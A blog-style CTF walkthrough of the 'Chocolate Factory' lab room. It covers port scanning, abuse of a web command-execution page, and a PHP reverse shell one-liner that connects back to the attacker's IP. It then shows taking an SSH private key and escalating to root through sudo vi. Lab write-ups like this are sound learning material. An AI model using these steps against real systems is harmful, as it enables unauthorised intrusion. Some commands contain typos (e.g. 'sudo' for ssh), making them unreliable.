In this post, i would like to share a walkthrough of the Chocolate Factory Room.


This room is been considered difficulty rated as LOW machine


Let’s Start!


We need to deploy the machine for us to play with the machine


Once the machine is fully up within 5 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

Information Gathering on Chocolate Factory


There are multiple ports that have been open but the crucial port that caught my attention

  • 21: csftpd 3.0.2
  • 22: OpenSSH 7.6p1
  • 80: Apache httpd 2.6.29

Let’s check what is stored inside the website.


Let’s start to enumerate the website by executing the command dirb <IP Address> /usr/share/wordlist/common.txt -X .php,.html, and hope that we found something useful.


We did find something useful which is the home.php directory


The page shows the area of the search column where you can key-in any command and EXECUTE button.


Let’s try out any command that works for Linux


The command below is uname -a


Let’s see what has been stored inside the server. Oh wow! I notice that key_rev_key


Let’s try to download the file by accessing the location in the browser as shown below


Sadly, it’s hard to read the file but i notice the key appears in the middle of the code.


It’s very hard for us to command via the browser. Let’s upload a shell so that we can access it using the terminal.


The shell that we can use in this situation such as follows:

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
* Replace the IP-address with your own IP and own port

For this activity, i use 1234 as my port


Let’s read the user.txt file at /home/charlie directory


However, we cannot read the file because the permission is denied. Let’s see what is written in the teleport file by using the cat teleport


We need to copy-paste everything on the teleport and create the id_rsa on our machine.


For us to get access via ssh by running the command below


sudo charlie@<IP Address> -i id_rsa

SSH Access to the machine


Now, we can read the user.txt by using the charlie credentials


Got It! Now, we need to focus on root privileges access


Let’s run the command sudo -l


I notice that /usr/bin/vi can be used for us to gain root privileges access.


We can execute :!/bin/sh and press enter. We have successfully gained root access.


I don’t find root.txt but we found root.py on /root/ directory


Let’s run the root.py by executing with python. The key that we need to enter is the same key as the first questions on the challenges!


While we are using root privileges access, let’s find charlie password by going to /var/www/html directory


We need to read validate.php in order to retrieve charlie’s password

-THE END-


Happy Learning Guys!